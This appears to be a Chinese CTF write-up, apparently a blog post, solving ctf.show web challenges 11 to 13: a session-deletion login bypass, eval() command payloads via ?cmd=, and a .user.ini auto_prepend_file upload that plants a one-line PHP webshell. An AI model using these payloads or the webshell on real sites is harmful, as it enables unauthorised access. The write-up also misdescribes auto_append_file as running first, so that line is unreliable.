11.ctf.show_web11
解题步骤
密码为空,用 bp 抓包,去掉 session。
$password==$_SESSION['password']:输入的password和session的结果一致
后端代码就是拿这个session的value值与我们输入的密码进行匹配, 由于这个value值我没解密出来, 所以这里干脆一点, 直接删除让变成空, 密码什么也不输, 也会是空, 空=空, 从而登录成功。
不是把它全部去掉。
知识点
session是另一种记录客户状态的机制,不同的是Cookie保存在客户端浏览器中,而Session保存在服务器上。客户端浏览器访问服务器的时候,服务器把客户端信息以某种形式记录在服务器上。这就是Session。客户端浏览器再次访问时只需要从该Session中查找该客户的状态就可以了。
12.ctf.show_web12
(1)看到 cmd,想到命令,eval()
(2)本题可以写入命令
解题步骤
1.看源码,发现 ?cmd= ;
2.输入?cmd=phpinfo();有回显;
注:eval 里面要写 ;
3.?cmd=highlight_file("index.php");
注:要打双引号。
4.输入?cmd=print_r(glob("*"));
5.?cmd=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a
732f56f.php");
知识点
glob() :返回匹配指定的文件名或目录。
比如:glob("*") 匹配任意文件; glob("*.txt")匹配以txt为后缀的文件;
可以使用命令,就可以用glob,比如,一句话木马
3.ctf.show_web13
解题步骤
1.先上传.user.ini,内容为
auto_prepend_file=a.txt2.然后上传a.txt,这样的话,每次调用 php 文件,都会自动包含 a.txt 文件,题目中要求文件的内容不能太长,会引起报错
<?php eval($_GET['w']);.user.ini :实际上就是一个可以由用户“自定义”的php.ini
在执行php代码是,先会扫.ini文件
auto_append_file:指定一个文件,自动包含在要执行的文件前。就是先执行
668
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
